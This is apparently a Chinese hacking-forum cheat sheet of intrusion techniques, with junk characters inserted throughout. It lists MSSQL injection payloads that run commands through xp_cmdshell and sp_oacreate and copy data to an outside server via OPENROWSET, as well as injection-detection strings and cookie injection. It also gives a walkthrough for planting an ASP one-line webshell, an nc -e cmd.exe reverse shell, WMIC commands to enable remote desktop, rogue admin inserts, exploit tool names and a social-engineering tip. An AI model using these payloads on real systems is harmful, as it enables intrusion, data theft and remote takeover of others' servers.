SA点数据库分离技术相关2 _4 b0 |. }7 F! U: s. N
6 ~! P# O$ E4 | z/ W& f1 S
# i) X8 z: L) R
SA点数据库分离搞法+语句:/ V/ ]9 L- V* u# g6 f. I8 V. j
$ Y0 b* X6 \- J, {5 E8 x9 \
注射点不显错,执行下面三条语句页面都返回正常。
; s3 {# e6 S! L4 P6 l; V- C3 xand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')1 f4 i4 q% ^' ^$ ?& x2 f8 Y
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')4 z9 {, W6 V! f4 V# E
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
( ]0 M* @4 a4 q0 T% I可以列目录,判断系统为2000,web与数据库分离
! F. \+ w- E* G. U0 {/ X遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
( u/ e" p. e7 g. e7 N3 e, f, C在注射点上执行$ v# P$ c! [! M5 Q& i9 j
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
! l4 W h* w, H. M4 S页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
9 A1 X+ j' R2 l+ z6 ~( F5 u还有我用NC监听得其他端口都没有得到IP。8 K/ w! b! w4 G
% x3 W& S9 o! O6 q# x) `$ M
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
Q2 i6 Q: j, p3 w+ p/ H z'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--; T7 C0 j: M3 ]
8 W& X9 X- O# d4 Y
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
( ?8 w( Z& I9 v: g- m6 ?' ]- K& ]5 S3 W4 K. I8 n
现在就猜想是不是数据库是内网而且不能连外网。
; s" ]& Q+ i$ d: X( t( B- h. c1 t! g
6 R4 O& m. h9 u' {& W! q* y
9 P- l9 G) U# z9 O' u( U$ _access导出txt文本代码* `6 N% @* N! q" g% k/ x
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
/ U9 T) G. p3 [" e
' Z( x! p) r( u/ U5 }
6 M- K ~- E7 [0 F# a8 e& C; A9 ~& G& M. g9 p
自动跳转到指定网站代码头
3 l$ b( g$ m3 ~9 z) z<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'># F, d5 Y# d. ]) v% \
|7 L: h1 ]% s$ x9 P( L# ~
8 q8 _, C5 K7 C! E% y入侵java or jsp站点时默认配置文件路径:7 J* X7 |+ W, i m F, q, n5 @
\web-inf\web.xml/ h! z' H6 S" a1 |8 Q: e# \
tomcat下的配置文件位置:
5 N+ X0 E A5 ^( b1 I8 j% ?\conf\server.xml (前面加上tomcat路径)
8 W6 d; r7 |/ M( }% w; E. E\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
1 Q2 F$ B! B* r3 W4 h6 K6 z
5 I3 _3 @: ~- N$ C) ~
+ n: w! ~: ~5 i/ g
( H/ [. }* x# u检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:/ d- [4 A* d; k9 g
-1%23: Q5 j \- `8 B/ L- ^
> 0 e: U# d2 b; Q" m6 f- ^
<+ t6 [# c4 K& N/ G0 n
1'+or+'1'='1
! d" g) n9 |9 n3 |1 F" O/ E Q' ^# Wid=8%bf/ x7 U9 H& [0 a8 ^* s
5 i1 q; o! }- \% K7 _7 M! i
全新注入点检测试法:
% y4 Z4 o& c' x2 O+ G在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。1 q4 _3 `9 V; Z
, R$ y: [0 T0 l) \% S8 ?
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
5 N; q) h$ n) ~' T0 ^& Y3 m+ s* d; x5 \) p$ \/ b( j
搜索型注入判断方法:
7 }4 ~0 s3 ?& o2 g2 d: i北京%' and '1'='1' and '%'='. E( B- `+ p0 G8 m
北京%' and '1'='2' and '%'='
& G ~2 E% c6 |! @# L V M( d4 Z+ Q2 u
( E w6 B f! Y& xCOOKIES注入:
+ X$ t; R8 v6 g: k6 c8 L* @0 Q
/ f/ Q/ D5 C `. f" Fjavascript:alert(document.cookie="id="+escape("51 and 1=1"));4 F0 K$ q$ a$ n( b* i
1 N$ D1 U; c) b7 V
2000专业版查看本地登录用户命令: k9 h0 n$ S' e8 [2 Y" p0 ]' w
net config workstation
0 U% m# T. L; d- {
& C3 G! y0 ]! l( M" H
0 s) ~- d. t9 [* U: S" e2003下查看ipsec配置和默认防火墙配置命令:
) [2 E* C; E, fnetsh firewall show config2 f0 e% d3 k# a+ x2 B. q1 F0 W# h
netsh ipsec static show all
, }( H$ M1 a' u0 i' v9 W) @: ^0 n. D6 Y% _3 Z6 j: E/ o7 ?+ b# s
不指派指定策略命令:
* _# \( ?, G* ^% Vnetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
1 T4 c# @& B5 L$ K. c2 ?netsh ipsec static show policy all 显示策略名1 x* |$ ]0 K4 m0 m' e3 M, E- d
2 h' ?( g( `, d; [0 ]+ u
, A8 ^8 X+ q# p4 t猜管理员后台小技巧:
7 W+ J# h5 U) T, ?admin/left.asp
1 p4 y5 o3 O4 V' C3 Sadmin/main.asp3 v9 E( `, V6 k9 ^
admin/top.asp
9 v# L* A0 p8 ?. o6 G$ Sadmin/admin.asp
6 q9 ~# T$ \. l$ d, g会现出菜单导航,然后迅雷下载全部链接6 T2 H- _' I1 ]5 I' y
" R0 s+ @9 I2 R+ J' U0 h, i( M* {. w( [+ I2 x: {
社会工程学:6 S; b6 \4 x, a5 j# m8 m8 p
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人+ I3 q% s9 N" `7 |* c
然后去骗客服
6 o' {: ?' }+ b6 |/ P7 P7 r" d8 A
1 L/ Z! q: ^( \5 p0 I T7 A. i统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
8 Q6 G) o2 F4 d+ b! ^查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, Q9 ~, H6 O8 s% h0 u
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
% K2 C- n! B# t3 a2 N* F8 m7 P( S1 t. F$ X6 R! k) M4 x
h1 x z3 U1 B8 \3 o+ O
1 p0 |/ ^5 `: X' w" W8 [6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
8 \& w/ n+ x$ R8 o# s( |- O# ~: {
4 V: t9 z1 _# M6 b1 q- b2 r8 h
* C [7 U9 o H8 i9 f
CMD加密注册表位置
, B! m5 Y& n( m3 b(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor s5 f# l6 E7 @8 _4 t6 I3 |9 s
AutoRun0 m' T/ ~- M. Q5 l I0 o3 U6 C* u* Y
0 [1 C6 i: D$ Q+ _
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor. z" {3 r/ j# \7 e( \3 M
AutoRun
( W: g+ n, G4 }- ^3 w& g
' {0 @' ^. \" P7 r% r: F# W8 f
! Q& I3 t s) Z7 e- n在找注入时搜索Hidden,把他改成test
* t& `% A3 k* v) s1 n0 W, ~7 m( @* g% x1 L
* c' b4 b3 a* K# H7 u1 }
( a4 b4 j* c5 v5 w4 J3 G7 jmstsc /v:IP /console 1 c# {" g$ F0 |2 i4 D
8 a: Z: W9 k1 l/ b8 V0 c; a/ a! K) v
一句话开3389:. }( T& X4 p9 L7 Y- x0 \9 A1 p
; r( N9 N. Y4 Z, Z& ]
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
' ^. q& U) j M0 S: n& F, T9 c0 J p开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
( Q* I4 d. ~. B+ X( x( s4 _3 l4 v1 ?* \8 B* \* n
4 E$ U9 X; t. \6 `
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下: C$ Y8 X6 A' Z8 B% t
Insert into admin(user,pwd) values('test','test')# _7 w; ` {1 ]& k6 ]& ?7 w+ H
' [. i% D7 K# H4 H; X/ W- T
) q1 B, W# [6 s8 LNC反弹8 h4 J6 x* U2 R4 q Z% K
先在本机执行: nc -vv -lp 监听的端口 (自己执行) ; {4 p: W( K, z- i
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
7 W3 A/ b/ g# N7 h
7 k2 ~9 |% H2 k- @$ ?9 h( L0 N* u. L: y/ o! x. y
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题4 U! H* ^5 ~* m& o7 l' m7 Z7 S
9 O7 A5 P9 \! I, j2 I
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录. R3 s) o V. x# V6 m8 m
例如:6 {+ e+ g8 e. r" O: Y
subst k: d:\www\ 用d盘www目录替代k盘: @' C9 _1 T1 C3 K9 f5 ~
subst k: /d 解除K盘代替 |